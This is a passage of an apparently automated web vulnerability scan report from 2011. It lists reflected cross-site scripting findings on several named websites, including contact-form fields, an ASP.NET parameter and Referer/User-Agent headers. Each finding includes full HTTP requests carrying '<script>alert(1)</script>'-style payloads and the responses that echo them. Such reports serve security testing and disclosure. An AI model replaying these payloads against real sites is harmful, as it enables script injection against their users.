POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x; __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; __utmc=61526075; __utmb=61526075.1.10.1303736107
Content-Length: 5126

_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$
...[SNIP]...
0alhcvIV7k7bu3g37AjmVa5J8yQOnBJBS8b%2Btlnypc31JyCiXOrCIh%2Fwf2BKBjw%3D%3D&__EVENTARGUMENT=&__EVENTTARGET=&_IG_CALLBACK=ctl01%24Banner%24UserSessionTimer1%24WebAsyncRefreshPanel1%23_0.084691817406564955a188<script>alert(1)</script>e5eb79051f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:57:37 GMT
Content-Length: 5375

/FusionVM/Images/FooterBackground2.gif/FusionVM/Images/CW-Logo-NoTag-Rev-MinSize.gif20112011.3.0.27<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0_0.084691817406564955a188<script>alert(1)</script>e5eb79051f<&>
...[SNIP]...

5.40. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [__EVENTVALIDATION parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.fusionvm.com
Path:	/FusionVM/DesktopDefault.aspx

Issue detail

The value of the __EVENTVALIDATION request parameter is copied into the HTML document as plain text between tags. The payload 2417a<script>alert(1)</script>718a25325a7 was submitted in the __EVENTVALIDATION parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x; __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; __utmc=61526075; __utmb=61526075.1.10.1303736107
Content-Length: 5126

_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$email=&__EVENTVALIDATION=%2FwEWBgKu2sn5AwLrz4T3CALMifq8DQLys6fMBwLn8K3zAwLxjbWVD6Xmq0l0NMQsglcvAmN0lT8Jos9NDGM8PnY%2Fy9C8ZIzR2417a<script>alert(1)</script>718a25325a7&__VIEWSTATE=1eNrdW81vG8cVFylRlkLHdGObTeOAmihObMX82CW5%2FFCsJJRkR4otRxUpOUgguMOdITnWcpfdnRXFHoqeeuyhKFK0hxZJPw5F0X%2BhQK9tcuihQE9tXfTj1KbfBXpI3%2BwuRVKSLVOioTAUwFnOvjf73vv95s3X6mNfKBQIxmRFTqdz8JcMhf2R
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:56:31 GMT
Content-Length: 1716

<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0<error><&>0System.Web.HttpException (0x80004005): The state information is invalid for this page and might be corrupted. ---> System.Web.UI.
...[SNIP]...
ows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
ViewState: /wEWBgKu2sn5AwLrz4T3CALMifq8DQLys6fMBwLn8K3zAwLxjbWVD6Xmq0l0NMQsglcvAmN0lT8Jos9NDGM8PnY/y9C8ZIzR2417a<script>alert(1)</script>718a25325a7 --->
...[SNIP]...

5.41. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.fusionvm.com
Path:	/FusionVM/DesktopDefault.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad15c"-alert(1)-"7bb0c543e64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FusionVM/DesktopDefault.aspx?ad15c"-alert(1)-"7bb0c543e64=1 HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Mon, 25 Apr 2011 12:56:49 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:56:48 GMT
Content-Length: 33904

<html>
<head id="htmlHead">
</head>
<body onload="sClock();">
<form method="post" action="DesktopDefault.aspx?ad15c%22-alert(1)-%227bb0c543e64=1" id="ctl00">
<div class="aspNetHidden">
<input
...[SNIP]...
<script language="javascript">Session_Init("/FusionVM/DesktopDefault.aspx?ad15c"-alert(1)-"7bb0c543e64=1", "/FusionVM/go/www.fusionvm/0/en-US/username=/Default.aspx");</script>
...[SNIP]...

5.42. http://www.google.com/search [tch parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.google.com
Path:	/search

Issue detail

The value of the tch request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dbae5(a)c4e69dbcb8a was submitted in the tch parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search?sclient=psy&hl=en&source=hp&q=learn.shavlik.com%2Fshavlik%2Findex.cfm%3Fm%3D1112%26pg%3D697&aq=f&aqi=&aql=&oq=&pbx=1&bav=on.2,or.r_gc.r_pw.&fp=76258fd74ceb8990&tch=1dbae5(a)c4e69dbcb8a&ech=1&psi=QW21TdK5G9PngQf2xuWSBA13037356298833 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: rU20-FBA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:47:44 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 25014

f94-wCe9....S....o....Q...v....l.K<!doctype html><title>learn.shavlik.com/shavlik/index.cfm?m=1112&pg=697. F..\(function(){var jesr_base_page_version=8;var jesr_user_state='c9c918f0';var jesr_sign
...[SNIP]...
index.cfm%3Fm%3D1112%26pg%3D697\\x26amp;aq\\x3df\\x26amp;aqi\\x3d\\x26amp;aql\\x3d\\x26amp;oq\\x3d\\x26amp;pbx\\x3d1\\x26amp;bav\\x3don.2,or.r_gc.r_pw.\\x26amp;fp\\x3d76258fd74ceb8990\\x26amp;tch\\x3d1dbae5(a)c4e69dbcb8a\\x26amp;ech\\x3d1\\x26amp;psi\\x3dQW21TdK5G9PngQf2xuWSBA13037356298833\x27)});});r();var l\x3dSN...Q\x27#\x27)):\x27#\x27;if(l\x3d\x3d\x27#\x27\x26\x26google.defre){google.defre\x3dc,~.*\x26\x26google
...[SNIP]...

5.43. http://www.stillsecure.com/m/ [comments parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the comments request parameter is copied into the HTML document as plain text between tags. The payload b9f53<script>alert(1)</script>165bb6e429d was submitted in the comments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=&email=&phone=&stateProvince=Not+Applicable&comments=b9f53<script>alert(1)</script>165bb6e429d&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:59 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17182

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<textarea name="comments">b9f53<script>alert(1)</script>165bb6e429d</textarea>
...[SNIP]...

5.44. http://www.stillsecure.com/m/ [company parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efe4"><script>alert(1)</script>2a9cfb0f5d8 was submitted in the company parameter. This input was echoed as 2efe4\"><script>alert(1)</script>2a9cfb0f5d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=2efe4"><script>alert(1)</script>2a9cfb0f5d8&email=&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:45 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="company" type="text" value="2efe4\"><script>alert(1)</script>2a9cfb0f5d8">
...[SNIP]...

5.45. http://www.stillsecure.com/m/ [email parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f5b7"><script>alert(1)</script>eaa16a5bb36 was submitted in the email parameter. This input was echoed as 1f5b7\"><script>alert(1)</script>eaa16a5bb36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=&email=1f5b7"><script>alert(1)</script>eaa16a5bb36&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:48 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17196

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="email" type="text" value="1f5b7\"><script>alert(1)</script>eaa16a5bb36">
...[SNIP]...

5.46. http://www.stillsecure.com/m/ [firstName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the firstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54249"><script>alert(1)</script>bb0ca4d9c50 was submitted in the firstName parameter. This input was echoed as 54249\"><script>alert(1)</script>bb0ca4d9c50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=54249"><script>alert(1)</script>bb0ca4d9c50&lastName=&company=&email=&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:38 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17190

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="firstName" type="text" value="54249\"><script>alert(1)</script>bb0ca4d9c50">
...[SNIP]...

5.47. http://www.stillsecure.com/m/ [lastName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the lastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb23d"><script>alert(1)</script>9630ad29cfd was submitted in the lastName parameter. This input was echoed as eb23d\"><script>alert(1)</script>9630ad29cfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=eb23d"><script>alert(1)</script>9630ad29cfd&company=&email=&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:42 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17178

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="lastName" type="text" value="eb23d\"><script>alert(1)</script>9630ad29cfd">
...[SNIP]...

5.48. http://www.stillsecure.com/m/ [phone parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffb4b"><script>alert(1)</script>380c8aa2910 was submitted in the phone parameter. This input was echoed as ffb4b\"><script>alert(1)</script>380c8aa2910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=&email=&phone=ffb4b"><script>alert(1)</script>380c8aa2910&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:52 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17138

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="phone" type="text" value="ffb4b\"><script>alert(1)</script>380c8aa2910">
...[SNIP]...

5.49. https://hourly.deploy.com/hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload c6f43<script>alert(1)</script>9d16581bbf9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)c6f43<script>alert(1)</script>9d16581bbf9
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Mon, 25 Apr 2011 13:41:34 GMT
Server: Apache/2.0.46 (Red Hat)
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

</TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)c6f43<script>alert(1)</script>9d16581bbf9</td>
...[SNIP]...

5.50. http://www.eset.com/business/server-security/linux-file [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/business/server-security/linux-file

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 619e4"-alert(1)-"482a8458b9e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /business/server-security/linux-file HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=619e4"-alert(1)-"482a8458b9e
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.1.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738137976%3B%20gpv_pageName%3Dus/business/products%7C1303738137981%3B%20s_nr%3D1303736337984-Repeat%7C1335272337984%3B%20s_invisit%3Dtrue%7C1303738137988%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17267
Date: Mon, 25 Apr 2011 12:59:24 GMT
X-Varnish: 1310979423
Age: 0
Via: 1.1 varnish
Connection: keep-alive
